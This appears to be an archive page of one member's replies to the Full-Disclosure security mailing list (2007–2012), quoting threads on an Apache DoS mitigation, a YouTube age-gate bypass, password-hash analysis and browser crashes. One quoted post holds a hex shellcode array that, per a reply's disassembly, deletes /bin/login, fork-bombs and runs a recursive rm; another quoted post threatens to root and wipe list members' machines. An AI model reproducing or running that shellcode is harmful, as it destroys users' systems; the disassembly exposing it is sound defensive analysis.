Re: [Full-disclosure] Facebook seems to think my Arch Linux box has malware on it

2012-01-21 Thread Nikolay Kichukov
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

agreed. That's one of the reasons why I've permanently closed my FB account 
some time ago ...

- -Nik

On 01/20/2012 05:26 AM, maxigas wrote:
> From: Wesley Kerfoot 
> Subject: [Full-disclosure] Facebook seems to think my Arch Linux box has 
> malware on it
> Date: Thu, 19 Jan 2012 22:13:06 -0500
> 
>> The message here for Facebook is that they shouldn’t implement systems that 
>> they can’t support when they fail.
> 
> Here the message for users is that they shouldn't rely on system they can't 
> fix (together) when they fail. :P
> 
> maxigas
> 
> --
> 
> The opinions expressed in this email are not mine.
> 
> Magic: http://maxigas.hu/maxigas.gpg
> EE2E D824 B5C3 4544 C2B8  B75F 2183 52B5 8EC1 57C1
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.11 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iQEcBAEBAgAGBQJPGnSFAAoJEDFLYVOGGjgX3PgH/1g0dyYKdDB6wxc8Ccj7lS6P
rgmHVRU822mNEez9JWgFS3F+oucwj4lFErPnORDOvDL9sdZzVVm0AwfnPpfU2RXY
W4a8PwxAx9BzRAcJM1Uz6PyKLVe19to9rdJWPuCl8qtQCGlsgbN0lTeiCxpYiJw/
4qg5eTOUW8NjwKdpKDMwtWgt/SVLe/Bh/iBTAxe//vBqBqPrDq2gQbKOQb6ZBU7j
m31yTVgfSD1ejifCDDcwlY3qNsZo7LgM3AudMR2SD/6AofLZbS/o35RSirqlDX4j
OCVGI7jthSZ0GlIm6IyU/FO4OEDKsxglogTPmL1MRXZGkIy9+oVfkkKkPCyat+U=
=vBMp
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] New awstats.pl vulnerability?

2011-12-12 Thread Nikolay Kichukov
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Same here, I even tried to notify a bunch of the ISP registrators of the IP 
address range those originated from.

- -Nik



On 12/13/2011 07:30 AM, Bruce Ediger wrote:
> On Mon, 12 Dec 2011, Lamar Spells wrote:
> 
>> For the past several days, I have been seeing thousands of requests
>> looking for awstats.pl like this one:
> 
> Yeah, me too.  They just started up.  I haven't seen any awstats.pl
> requests since 2010-05-18, and now I've gotten batches of them, since
> about 2011-11-22, but heavier since the start of December.
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.11 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iQEcBAEBAgAGBQJO5vwQAAoJEDFLYVOGGjgX8oEH/i3kjBAtJcT1DJvJVcRX4O+9
t2UcvehxpyjalhCttTmQrE8EcLrtGS62K0ZziNQPvXirOtJ0ERcaARsQFiTT7fCi
YyEuNDa15nx+wS2dgnKWEyCjz356RobtXgFflrbfHNPmBCRGd/qM3VzquUDYRdef
E+JtU0J3RgilXxMFLrZK5GHwZOUKNebv/T6bRPescMzRsX/DO89Csv0kWJM9xvyI
kd0El+/thw8aj9/21dB/JWhdbiBozuKd2MG1hTog/xKFVzVqdTzkNoZ7Ok15n91v
LoAx7cLqDInmx1syDLOSMhzRoyqGAA9Uq/WuTpDqTDcHjVwjGJPeYjc97dIJWdY=
=0+7+
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] NEVER AGAIN

2011-11-22 Thread Nikolay Kichukov
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Can you please stop this?

Thanks

On 11/22/2011 09:48 AM, xD 0x41 wrote:
> You fucking pieces of shit forget when it was once me who was asking,
> for help in regards to mutiple things, and when offered NONE, in
> regards to code i later had to find thanks to fucking blakhatz, why
> the fuck would i want or care for this list now, forget any
> competition i ever started, you clearly want, and, forget to see, even
> when it maybe something small for YOU, it maybe NOT for me, yet, i am
> hit from every side, nonstop about shit, wich i KNOW there is plenty
> of you who also have these codes, and thats exactly why your stfu and
> lettin me cop it.Seriously, when i was the one askin , i made NO big
> deal, when i was mutiple times confronted with exactly how i acted,
> and that was simply to NOT show things, because i did this per person
> basis, if i knew i could trust, then they were shown things..and they
> will always be shown things, as they remain friends.. the rest of you
> who shot your mouths of, watch the hell out, coz you may find a new
> user on your system soon called 'arsehole' and all he wants todo is
> get root, sdo he can rm it. a nice fuckign wurm you all deserve...
> harvesting of your domains, those who spoke out and, bombed me for
> shitall, and helped me not one bit when i had my ass on the line for
> shit like freepbx :s screw this list, believe it, i will root the
> people who annoyed me, one by one, and yes, ill FD that.
> now, fuck you all, except the very few, who know who they are . the
> rest of you who ignored me, and now dare to backlash chat me about a
> crappy bash 0day you DONT have,. go fk yourselfs, and for valdis, i
> hope your vt.edu, has a whole slew of new users you suckm as any
> kind of friend or moderator your also, the BIGGEST liar, who
> cannot code a thing, on this fucking list.
> dick.
> as for root@fibertel, indeed stfu, it was me on the ophone, just know
> that, your job is gone.
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.11 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iQEcBAEBAgAGBQJOy1jFAAoJEDFLYVOGGjgXc3cIALjndFGBDVNrlXP8rORE/QY1
rlN1Zr7qMudbIJH3cbMhFSrJzquiAZQwW3GpzUGdvPwfFTWfZHdxZiHJADqDCdrI
FwY7coEH2Ido7+2QLhJ/42O62zvjcb44OOV0sIhX0BbI5X/mPSQrf8qlDBZ0Bcs6
UM7/8f0OCzl/wVocgA9556WHtReuc10GvnboNWUSfKmJd1V2BDkBTyThpE1snsU9
QGuta3RfDaW5RWE/eYc5L5MiFC4S4sv95TJyWtGu+IbGOuEmmU31bNhdZnw8XCmO
dg5/shHFvINdfxBpbxWromhumKzhaNzqihmyX1TM7+uCpUWN1uBCMYLO/0snhdg=
=hXUC
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Advisory: Range header DoS vulnerability Apache HTTPD 1.3/2.x (CVE-2011-3192)

2011-08-27 Thread Nikolay Kichukov
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Hi,
This one works like charm on my debian stable

LimitRequestFieldSize 200


in the apache2.conf as global directive for all vhosts.

Cheers,
- -Nik

On 08/26/2011 05:56 PM, bodik wrote:
> Dne 08/26/11 13:26, bodik napsal(a):
>>
 Option 2: (Pre 2.2 and 1.3)

 # Reject request when more than 5 ranges in the Range: header. #
 CVE-2011-3192 # RewriteEngine on RewriteCond %{HTTP:range}
 !(bytes=[^,]+(,[^,]+){0,4}$|^$) # RewriteCond %{HTTP:request-range}
 !(bytes=[^,]+(?:,[^,]+){0,4}$|^$) RewriteRule .* - [F]
>>> ^^ Better use this:
>>>
>>> RewriteEngine on RewriteCond %{HTTP:range} !(^bytes=[^,]+(,[^,]+){0,4}$|^$)
>>> [NC,OR] RewriteCond %{HTTP:request-range} !(^bytes=[^,]+(,[^,]+){0,4}$|^$)
>>> [NC] RewriteRule .* - [F]
>>>
>>
>> in any case, i found very wierd behavior on some of our webservers. as we
>> applied the first version of workaround, something about 15% of our webpages
>> seems to be broken, but the rest of virtual hosts were working fine.
> 
> because of messing with Options FollowSymLinks or SymLinksIfOwnerMatch and
> mod_rewrite i have to implement other workaround ..
> 
> b
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.11 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iQEcBAEBAgAGBQJOV7fKAAoJEDFLYVOGGjgXniQH/jQoeD+vKAT1D+PdCijthhNA
Svjhvyl801n/b+ggJvLq6HclMZKacThcuVqtyb+ehf1b+3D9XMeMtieze0sC2Qnt
GAuBKSUI+b7QRSJETjncBqKeVu7RpeeKeKI3aotqXtNTknP+S0McKpPKUYEM591K
iaam/DkmzTob6Ey2J0anQs+58yCqLqEusoojqIy4T8Ql48EDoE/TnSZphA3BGGpC
rZ/r0Hv49SJkTWIwY03+epYDTuIq8+LK9flEkSsKC4OqFkZagx7MEjyDv1Xztj0K
8hsC+iC9k+RCKdAnQVPiJ/CaKgUbNeghuX/bIxCm0edjLFUhootlf7ie8dvnxbs=
=LO33
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] here

2008-01-02 Thread Nikolay Kichukov
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Thanks Andrew! Nice catch! ;-)

Cheers,
- -Nikolay

Andrew Farmer wrote:
> On 20 Dec 07, at 18:51, onion ring wrote:
> 
>> char sc[] =
>>  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
>>  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
>>  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
>>  "\x31\xC0\x89\xC3\x89\xC1\x41\xB0\x30\xCD\x80\x31\xC0\xFE\xC3\x80"
>>  "\xFB\x1F\x72\xF3\x04\x40\xCD\x80\x89\xC2\x31\xC0\xB0\x02\xCD\x80"
>>  "\x39\xC0\x74\x08\x31\xC0\x89\xC3\xB0\x01\xCD\x80\x31\xC0\xB0\x42"
>>  "\xCD\x80\x43\x39\xDA\x74\x08\x89\xD3\x31\xC0\x04\x25\xCD\x80\x31"
>>  "\xC0\x50\x68\x6F\x67\x69\x6E\x68\x69\x6E\x2F\x6C\x68\x2F\x2F\x2F"
>>  "\x62\x89\xE3\x31\xC0\x04\x0A\xCD\x80\x31\xC0\x50\x68\x2A\x2F\x2F"
>>  "\x2F\x89\xE2\x50\x68\x2D\x72\x66\x66\x89\xE1\x50\x68\x6E\x2F\x72"
>>  "\x6D\x68\x2F\x2F\x62\x69\x89\xE3\x50\x52\x51\x53\x89\xE1\x31\xD2"
>>  "\x04\x0B\xCD\x80";
> 
> 
> Abbreviated disassembly:
>signal(SIGHUP, SIG_IGN)
>something that looks like a 15-level deep fork() bomb
>something involving kill()
>unlink("/bin/login")
>execve("//bin/rm", {"//bin/rm", "-rff", "*///"})
> 
> You could at least try to obfuscate your constants a little better.  
> That was way too easy.
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iQEVAwUBR3uGKzFLYVOGGjgXAQLqzwgAo4UyRGOIGKt2rHK32x17Imt5axyJIHQF
+sIq8NsJzw5U5psM63MrxIkKajW2c/THOUIbFR4TaFAt1/ng3covsJHh1iX6bpfN
uD18QTY3FHPIv9LNXoYgtJmLiUBFqY1AWXd5ih1e/LMRa9ZP8KVjv14EnmJom8tP
qL/WEtYjq60reaLpLpowhVLi4q1KKjvC4BoRz7zGmp26As6ah/5HmYpjpsiA7cKg
v7959l4bQsy0QHG6YP+pY8PfQX3KmhFns1yAsQF93TMGx3N8LYa1fdcXkZLrw5nf
L8tI3QZ+Qhu4lck+QzElCtD3sUuB4z/ae+KsJWWJuGoDe7CdrR5Yug==
=bBbH
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] peace

2007-10-18 Thread Nikolay Kichukov
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

so?

- -Nikolay

fabio wrote:
> https://intranet.usip.org/datacenter/eps/CustomCal.php
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iQEVAwUBRxeGtzFLYVOGGjgXAQJHqwf+K9A6fbNUIGa4W2aTEvQf+UqAgCIHiGJF
xNJRdhIhnB54gqkDhk8+Gzu4rZovWlZE9bw6EtAcYQCJEyj/1gNd5k89FOa34afB
8UwG59a8Wz8bttBBsoVCKaG3JH/MtjZ9fJwKbqvuXEIHT55YFKlsCIHXtImCXcc6
I8qhiEO3SFPc6/NGO3AJxtN9g90VBlfVt8V57xObmRU1MipjgUKX+DaT7w6dGR5N
rAMO9iumwxPzUEStwtzbOs9h/1vwJl+a2wlzXONzxCDirQcWEeNtlGgke4bfmp4v
lrQePBwUSMN1y/msO6n8MX+ex3okKsBklWJ9jEqJEvVYcTC7xsGLCg==
=a8zs
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] password hash

2007-10-06 Thread Nikolay Kichukov
Nice explanation Vladis, thanks!

Cheers,
-Nikolay

[EMAIL PROTECTED] wrote:
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
>
> Wow Vladis shut the fuck up
>
> On Fri, 05 Oct 2007 10:35:36 -0400 [EMAIL PROTECTED] wrote:
>   
>> On Thu, 04 Oct 2007 22:22:14 EDT, Brian Toovey said:
>> 
>>> Does anyone know what kind of password hash this is?
>>> 'password1' =
>>> &c6;Ub&c3;&ab;&19;a&cf;&86;
>>>   
>> Hex format would be less likely to be mis-parsed.  I'm *guessing*
>> you
>> mean the hash is x'c65562c3 ab1961cf 86' - which is slightly odd,
>> being
>> 72 bits long.  A salted 64-bit hash, perhaps?  Or it might be some
>> home-grown
>> hash that somebody invented.
>>
>> If you know what 'password1' hashes to, it's time to do some
>> differential
>> cryptography and try hashing 'password2', 'password11',
>> 'passwor111', and so
>> on, to determine how many input characters the hash considers.
>> The next thing
>> to try is hashing 'qassword1' (which has one bit different from
>> 'password1')
>> and seeing how many of the output bits change, which will tell you
>> the relative
>> strength of the hash.  A good hash will have about half the bits
>> change on a
>> one-bit difference (and continuing through q, r, s, t and so on
>> won't reveal
>> any pattern of *which* bits change), while a bad hash will fail to
>> cause a bit
>> cascade and only a few bits will be different in the output.
>> 
> -BEGIN PGP SIGNATURE-
> Note: This signature can be verified at https://www.hushtools.com/verify
> Charset: UTF8
> Version: Hush 2.5
>
> wpwEAQECAAYFAkcGdtUACgkQ+dWaEhErNvQLwQP+Ko1yikEE4RLH8sLeEb5e/NeMyVOC
> LbhDm1FOs3U0mIEhA0Wuuh/7OP39xI9ot4L7kTZVBLL3b9pF7hrG4Wl2btsZPhBScGFc
> LuUwNkW1UM6sEiZOTiysjRw3fcxMghr3uxVxD/fi3e14mJeb8y0Gcd/i7B/I81AVWORO
> RlXr0ZY=
> =E3Mo
> -END PGP SIGNATURE-
>
> --
> Do you need to diversify your portfolio?  Click here for informaton on 
> trading currency.
> http://tagline.hushmail.com/fc/Ioyw6h4eApyx5Oq5Gf7tziyDDQmkClkksyK1XaXAXEQZzL2L1TjxLy/
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>   

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] A Request To Everyone

2007-09-21 Thread Nikolay Kichukov
I'd request that all of you stop fighting and leave the list to deal
with what it's meant to.

Cheers,
-Nikolay

[EMAIL PROTECTED] wrote:
> I'm in favor of booting them all off the list.  Let 'em keep their flame wars 
> on EFNet.
> 
> Geoff
> 
> Sent from my BlackBerry wireless handheld.
> 
> -Original Message-
> From: Aditya K Sood <[EMAIL PROTECTED]>
> 
> Date: Thu, 20 Sep 2007 12:57:57 
> To:full-disclosure@lists.grok.org.uk
> Subject: [Full-disclosure] A Request To Everyone
> 
> 
> Hi
> 
> After looking at the mail wars , I want to say only two lines.
> 
> I dont know who Meta Info is , Lamer Buster is , LSNN is and all.
> I dont know how they are generating mails and putting my name
> everywhere. Thats it.
> 
> Thanks to all.
> 
> Regards
> Aks
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Skype - the voip company

2007-08-17 Thread Nikolay Kichukov
Hello,
It does not seem to be OS dependent, as I am running debian lenny/sid
using skype version 1.4 Beta and it cannot connect.

Cheers,
-Nik

Tonu Samuel wrote:
> On Thu, 2007-08-16 at 22:19 +0200, Fabian Wenk wrote:
>> Hello Simon
>>
>> Simon Smith wrote:
>>> Greetings,
>>> Does anyone know any more details about the current skype outage, other
>>> than what is being presented on their web-site? It appears that all
>> I guess "Problems with Skype login" [1] does tell a little bit more.
>>
>>[1] 
>> http://heartbeat.skype.com/2007/08/problems_with_skype_login.html
> 
> Still noone exactly knows what is going on. But there are specilations
> that Microsoft intentionally broke it with latest patches and Skype
> working hard to find solution.
> 
> I do not have anything better than all others, so take it as rumour only
> and think twice if you use closed source including windows or skype.
> 
>Tõnu
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] youtube flagged content age verification bypass

2007-06-30 Thread Nikolay Kichukov
excellent find ;-)

cheers,
-Nik


- Original Message - 
From: <[EMAIL PROTECTED]>
To: 
Cc: <[EMAIL PROTECTED]>
Sent: Friday, June 29, 2007 3:32 PM
Subject: [Full-disclosure] youtube flagged content age verification bypass


> Youtube.com requires account creation and login before allowing
> visitors to view videos flagged by users as inappropriate.
>
> Sample flagged video: http://www.youtube.com/watch?v=Chei2buYo9s
> "This video may contain content that is
> inappropriate for some users, as flagged by YouTube's user
> community.
> To view this video, please verify you are 18 or older by logging in
> or signing up."
>
> alternatively, visit http://www.youtube.com/v/Chei2buYo9s
>
> --
> Click to find great rates on medical insurance, save big, shop here
>
http://tagline.hushmail.com/fc/Ioyw6h4d8QNpBm7Xd6WGFaIc6rtGaJkKuMOn8BK3fDUMda8ctqP6SM/
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] DOS on phrack?

2007-06-30 Thread Nikolay Kichukov
seems up to me as of this moment,
-nik


- Original Message - 
From: "Aditya K Sood" <[EMAIL PROTECTED]>
To: "scott" <[EMAIL PROTECTED]>;

Sent: Sunday, July 01, 2007 9:59 PM
Subject: Re: [Full-disclosure] DOS on phrack?


> Yup scott
>  the problem is there.
>
> Regards
> Aditya K Sood
> http://www.secniche.org
>
> scott wrote:
> > -BEGIN PGP SIGNED MESSAGE-
> > Hash: SHA1
> >
> > It seems that Phrack.org is experiencing a serious DoS.I tried a few
> > times to connect today to no avail.
> >
> > Not to increase traffic to the DoS,is anyone else also experiencing the
> > same?
> >
> > Regards,
> >Scott
> > -BEGIN PGP SIGNATURE-
> > Version: GnuPG v1.4.6 (GNU/Linux)
> > Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
> >
> > iD8DBQFGhfOkelSgjADJQKsRAlD5AKCNo2L7RsiiERAyDYZ53i61duWA6QCdEtqw
> > NeYfdpD6AZEoMSGVmClNCWA=
> > =nimg
> > -END PGP SIGNATURE-
> >
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
> >
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Paper: Secure file upload in PHP web applications

2007-06-15 Thread Nikolay Kichukov
Very nice presentation.
Thanks a lot for sharing with us.

Regards,
-Nikolay Kichukov

Alla Bezroutchko wrote:
> Various web applications, such as blogs, forums and photo galleries
> allow users to upload files. Providing file upload function without
> opening security holes proved to be quite a challenge in PHP web
> applications. The applications we have tested suffered from a variety of
> security problems, ranging from arbitrary file disclosure to remote
> arbitrary code execution.
> 
> The paper describes various security holes occurring in file upload
> implementations and suggests a way to implement a secure file upload.
> 
> The paper can be downloaded from
> http://www.scanit.be/uploads/php-file-upload.pdf
> 
> Regards,
> Alla Bezroutchko
> Scanit
> http://www.scanit.be/
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Firefox 2.0.0.3 Out-of-bounds memory access viaspecialy crafted html file

2007-05-01 Thread Nikolay Kichukov
Exploit works like a charm on FF 2.0.3 on win2k sp4.

Regards,
-Nikolay Kichukov

- Original Message - 
From: "carl hardwick" <[EMAIL PROTECTED]>
To: 
Sent: Tuesday, May 01, 2007 10:26 AM
Subject: [Full-disclosure] Firefox 2.0.0.3 Out-of-bounds memory access
viaspecialy crafted html file


> Product: Firefox 2.0.0.3
> Description: Out-of-bounds memory access via specialy crafted html file
> Type: Remote
>
> Vulnerability can be exploited by using a large value in a href tag to
> create an out-of-bounds memory access.
>
> Proof Of Concept exploit:
> http://www.critical.lt/research/opera_die_happy.html
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Internet Explorer Crash

2007-04-17 Thread Nikolay Kichukov
Also works on IE 6.0.2800

-nik


- Original Message - 
From: "J. Oquendo" <[EMAIL PROTECTED]>
To: "full-disclosure" 
Sent: Tuesday, April 17, 2007 8:09 PM
Subject: [Full-disclosure] Internet Explorer Crash


> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Dotclear 1.* Cross Site Scripting Vulnerability

2007-04-17 Thread Nikolay Kichukov
It would've been nice if that was in English...

Anyways, seems to be a nice review..

-nik


- Original Message - 
From: "Julien Dhaille" <[EMAIL PROTECTED]>
To: 
Sent: Tuesday, April 17, 2007 12:29 PM
Subject: [Full-disclosure] Dotclear 1.* Cross Site Scripting Vulnerability


> I wrote a paper about Xss exploitation with this bug.
>
http://wargan.org/index.php/2007/04/16/9-dotclear-126-hijack-authenticated-session
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] A lot of XSS

2007-03-31 Thread Nikolay Kichukov
yes, they seem already fixed, all of them ;_P)

Congratulations on the good work.

-Nikolay Kichukov

- Original Message - 
From: "Hanno Böck" <[EMAIL PROTECTED]>
To: 
Sent: Friday, March 30, 2007 4:18 PM
Subject: [Full-disclosure] A lot of XSS


> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] NewOrder.box.sk Inherits Severe RedirectionVulnerability

2007-03-29 Thread Nikolay Kichukov
Hello Aditya,
I see your point there. Hope they get it fixed. Should the patch involve
some referrer checking?

Regards,
-Nikolay Kichukov

- Original Message - 
From: "Aditya K Sood" <[EMAIL PROTECTED]>
To: "Nikolay Kichukov" <[EMAIL PROTECTED]>;

Sent: Thursday, March 29, 2007 7:40 PM
Subject: Re: [Full-disclosure] NewOrder.box.sk Inherits Severe
RedirectionVulnerability


> Nikolay Kichukov wrote:
> > Hello there,
> > I've read the article, but I still do not see where the severe
redirection
> > vulnerability is. Is this not a feature of the neworder.box.sk web site
to
> > allow anyone to be redirected to anypage they submit to redirect.php?
> >
> > Thanks,
> > -Nikolay Kichukov
> >
> >
> > - Original Message - 
> > From: "Aditya K Sood" <[EMAIL PROTECTED]>
> > To: 
> > Sent: Wednesday, March 28, 2007 8:49 PM
> > Subject: [Full-disclosure] NewOrder.box.sk Inherits Severe
> > RedirectionVulnerability
> >
> >
> >
> >> Hi
> >>
> >> Previous Rootkit.com Vulnerability have been patched.
> >> The neworder.box.sk is famous security website.It inherits very
specific
> >> redirection attacks. The domain forwarding or URL forwarding not only
> >> directly possible through the website but can be called from third
party
> >> directly.
> >>
> >> A very generic analysis have been undertaken based on search engine
> >> specification.Look into the issues at:
> >>
> >>
http://zeroknock.blogspot.com/2007/03/neworderboxsk-inherits-severe.html
> >> http://zeroknock.metaeye.org/analysis/neworder_red.xhtml
> >>
> >> Regards
> >> Zeroknock
> >> http://zeroknock.metaeye.org/mlabs
> >>
> >> ___
> >> Full-Disclosure - We believe in it.
> >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >> Hosted and sponsored by Secunia - http://secunia.com/
> >>
> >>
> >
> >
> >
> Hi nikolay
>
>Thats where the thinking is bit off side.
> Remember there
> is lot of difference between redirection occurs from the main website
> through generating event and the redirection  that occurs from the third
> party.It will be okay to the feature context if the redirection supports
> only from the website.
>
> More precisely a search engine check is performed at the top to show
> that the page is not subjected as standard page for redirection. If its
> a feature than it must not be redirected from the third party.
>
> Thats All.
>
> Regards
> Adi
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] NewOrder.box.sk Inherits Severe RedirectionVulnerability

2007-03-29 Thread Nikolay Kichukov
Hello there,
I've read the article, but I still do not see where the severe redirection
vulnerability is. Is this not a feature of the neworder.box.sk web site to
allow anyone to be redirected to anypage they submit to redirect.php?

Thanks,
-Nikolay Kichukov


- Original Message - 
From: "Aditya K Sood" <[EMAIL PROTECTED]>
To: 
Sent: Wednesday, March 28, 2007 8:49 PM
Subject: [Full-disclosure] NewOrder.box.sk Inherits Severe
RedirectionVulnerability


> Hi
>
> Previous Rootkit.com Vulnerability have been patched.
> The neworder.box.sk is famous security website.It inherits very specific
> redirection attacks. The domain forwarding or URL forwarding not only
> directly possible through the website but can be called from third party
> directly.
>
> A very generic analysis have been undertaken based on search engine
> specification.Look into the issues at:
>
> http://zeroknock.blogspot.com/2007/03/neworderboxsk-inherits-severe.html
> http://zeroknock.metaeye.org/analysis/neworder_red.xhtml
>
> Regards
> Zeroknock
> http://zeroknock.metaeye.org/mlabs
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Local user to root escalation in apache 1.3.34 (Debian only)

2007-03-25 Thread Nikolay Kichukov
Hello Richard,
Seems to me I have also been so unprotected for this long ...

I love the debian project and hope it is not going to an end...

However I already use apache2 for all my machines.

Regards,
-Nikolay Kichukov

- Original Message - 
From: "Richard Thrippleton" <[EMAIL PROTECTED]>
To: "Nikolay Kichukov" <[EMAIL PROTECTED]>
Cc: 
Sent: Tuesday, February 27, 2007 3:37 AM
Subject: Re: [Full-disclosure] Local user to root escalation in apache
1.3.34 (Debian only)


> On Mon Feb 26 21:15, Nikolay Kichukov wrote:
> > Lool,
> > how long has this bug been around?
> Almost a year, looking at that original patch that caused the problem. To
be
> fair, nobody had commented on the security issues until I stumbled across
